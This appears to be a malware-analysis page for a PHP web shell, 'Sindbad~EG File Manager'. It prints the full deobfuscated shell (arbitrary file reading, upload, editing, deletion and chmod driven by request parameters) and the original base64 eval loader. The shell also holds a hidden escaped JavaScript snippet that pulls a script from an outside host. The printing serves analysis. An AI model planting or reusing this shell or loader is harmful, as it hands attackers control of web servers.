PHP Malware Analysis

Back to list

Filename: minipriv.php

Tags

Title
  • D.R.S Dz
Input
  • _GET
  • _POST
  • _FILES
Environment
  • getcwd
Files
  • file_get_contents
  • copy

Deobfuscated code

<?php

$obirninja = "=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";
$t13r = "WlhaaGJDZ25QejRuTG1kNmRXNWpiMjF3Y21WemN5aG5lbWx1Wm14aGRHVW9aM3BwYm1ac1lYUmxLR0poYzJVMk5GOWtaV052WkdVb2MzUnljbVYyS0NSdlltbHlibWx1YW1FcEtTa3BLU2s3";
eval /* PHPDeobfuscator eval output */ {
    echo "<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\n<title>D.R.S Dz</title>\n<style>\nbody{\nfont-family: \"Racing Sans One\", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: \"Rye\", cursive;\n}\na{\ncolor: #000;\ntext-decoration: none;\n}\na:hover{\ncolor: #fff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center>Sindbad~EG File Manager</center></H1>\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr><td>Current Path : ";
    if (isset($_GET['path'])) {
        $path = $_GET['path'];
    } else {
        $path = getcwd();
    }
    $path = str_replace('\\', '/', $path);
    $paths = explode('/', $path);
    foreach ($paths as $id => $pat) {
        if ($pat == '' && $id == 0) {
            $a = true;
            echo "<a href=\"?path=/\">/</a>";
            continue;
        }
        if ($pat == '') {
            continue;
        }
        echo "<a href=\"?path=";
        for ($i = 0; $i <= $id; $i++) {
            echo "{$paths[$i]}";
            if ($i != $id) {
                echo "/";
            }
        }
        echo '">' . $pat . '</a>/';
    }
    echo "</td></tr><tr><td>";
    if (isset($_FILES['file'])) {
        if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
            echo "<font color=\"green\">File Upload Done.</font><br />";
        } else {
            echo "<font color=\"red\">File Upload Error.</font><br />";
        }
    }
    echo "<form enctype=\"multipart/form-data\" method=\"POST\">\nUpload File : <input type=\"file\" name=\"file\" />\n<input type=\"submit\" value=\"upload\" />\n</form>\n</td></tr>";
    if (isset($_GET['filesrc'])) {
        echo "<tr><td>Current File : ";
        echo $_GET['filesrc'];
        echo "</tr></td></table><br />";
        echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
    } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
        echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
        if ($_POST['opt'] == 'chmod') {
            if (isset($_POST['perm'])) {
                if (chmod($_POST['path'], $_POST['perm'])) {
                    echo "<font color=\"green\">Change Permission Done.</font><br />";
                } else {
                    echo "<font color=\"red\">Change Permission Error.</font><br />";
                }
            }
            echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
        } elseif ($_POST['opt'] == 'rename') {
            if (isset($_POST['newname'])) {
                if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                    echo "<font color=\"green\">Change Name Done.</font><br />";
                } else {
                    echo "<font color=\"red\">Change Name Error.</font><br />";
                }
                $_POST['name'] = $_POST['newname'];
            }
            echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
        } elseif ($_POST['opt'] == 'edit') {
            if (isset($_POST['src'])) {
                $fp = fopen($_POST['path'], 'w');
                if (fwrite($fp, $_POST['src'])) {
                    echo "<font color=\"green\">Edit File Done.</font><br />";
                } else {
                    echo "<font color=\"red\">Edit File Error.</font><br />";
                }
                fclose($fp);
            }
            echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
        }
        echo "</center>";
    } else {
        echo "</table><br /><center>";
        if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
            if ($_POST['type'] == 'dir') {
                if (rmdir($_POST['path'])) {
                    echo "<font color=\"green\">Delete Dir Done.</font><br />";
                } else {
                    echo "<font color=\"red\">Delete Dir Error.</font><br />";
                }
            } elseif ($_POST['type'] == 'file') {
                if (unlink($_POST['path'])) {
                    echo "<font color=\"green\">Delete File Done.</font><br />";
                } else {
                    echo "<font color=\"red\">Delete File Error.</font><br />";
                }
            }
        }
        echo "</center>";
        $scandir = scandir($path);
        echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr class=\"first\">\n<td><center>Name</center></td>\n<td><center>Size</center></td>\n<td><center>Permissions</center></td>\n<td><center>Options</center></td>\n</tr>";
        foreach ($scandir as $dir) {
            if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
                continue;
            }
            echo "<tr>\n<td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\n<td><center>--</center></td>\n<td><center>";
            if (is_writable("{$path}/{$dir}")) {
                echo "<font color=\"green\">";
            } elseif (!is_readable("{$path}/{$dir}")) {
                echo "<font color=\"red\">";
            }
            echo perms("{$path}/{$dir}");
            if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
                echo "</font>";
            }
            echo "</center></td>\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\n<select name=\"opt\">\n<option value=\"\"></option>\n<option value=\"delete\">Delete</option>\n<option value=\"chmod\">Chmod</option>\n<option value=\"rename\">Rename</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"dir\">\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n<input type=\"submit\" value=\">\" />\n</form></center></td>\n</tr>";
        }
        echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
        foreach ($scandir as $file) {
            if (!is_file("{$path}/{$file}")) {
                continue;
            }
            $size = filesize("{$path}/{$file}") / 1024;
            $size = round($size, 3);
            if ($size >= 1024) {
                $size = round($size / 1024, 2) . ' MB';
            } else {
                $size .= ' KB';
            }
            echo "<tr>\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\n<td><center>" . $size . "</center></td>\n<td><center>";
            if (is_writable("{$path}/{$file}")) {
                echo "<font color=\"green\">";
            } elseif (!is_readable("{$path}/{$file}")) {
                echo "<font color=\"red\">";
            }
            echo perms("{$path}/{$file}");
            if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
                echo "</font>";
            }
            echo "</center></td>\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\n<select name=\"opt\">\n<option value=\"\"></option>\n<option value=\"delete\">Delete</option>\n<option value=\"chmod\">Chmod</option>\n<option value=\"rename\">Rename</option>\n<option value=\"edit\">Edit</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"file\">\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n<input type=\"submit\" value=\">\" />\n</form></center></td>\n</tr>";
        }
        echo "</table>\n</div>";
    }
    echo "<br />Sindbad File Manager Version <font color=\"red\">1.0</font>, Coded By <font color=\"red\">Sindbad EG ~ The Terrorists</font>\n</BODY>\n</HTML>";
    function perms($file)
    {
        $perms = fileperms($file);
        if (($perms & 0xc000) == 0xc000) {
            // Socket
            $info = 's';
        } elseif (($perms & 0xa000) == 0xa000) {
            // Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            // Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            // Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            // Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            // Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            // FIFO pipe
            $info = 'p';
        } else {
            // Unknown
            $info = 'u';
        }
        $info .= $perms & 0x100 ? 'r' : '-';
        $info .= $perms & 0x80 ? 'w' : '-';
        $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
        $info .= $perms & 0x20 ? 'r' : '-';
        $info .= $perms & 0x10 ? 'w' : '-';
        $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
        $info .= $perms & 0x4 ? 'r' : '-';
        $info .= $perms & 0x2 ? 'w' : '-';
        $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
        return $info;
    }
    ?>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%264E%2633iuuqt%264B00ibdljohuppm/ofu0mpht0dj%7B/kt%2633%264F%264D0tdsjqu%264F%26311')</script><?php 
};
?> 


Original code

<?php
$obirninja = "=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";
$t13r = "WlhaaGJDZ25QejRuTG1kNmRXNWpiMjF3Y21WemN5aG5lbWx1Wm14aGRHVW9aM3BwYm1ac1lYUmxLR0poYzJVMk5GOWtaV052WkdVb2MzUnljbVYyS0NSdlltbHlibWx1YW1FcEtTa3BLU2s3";
eval(htmlspecialchars_decode(base64_decode(urldecode(base64_decode($t13r)))));
?>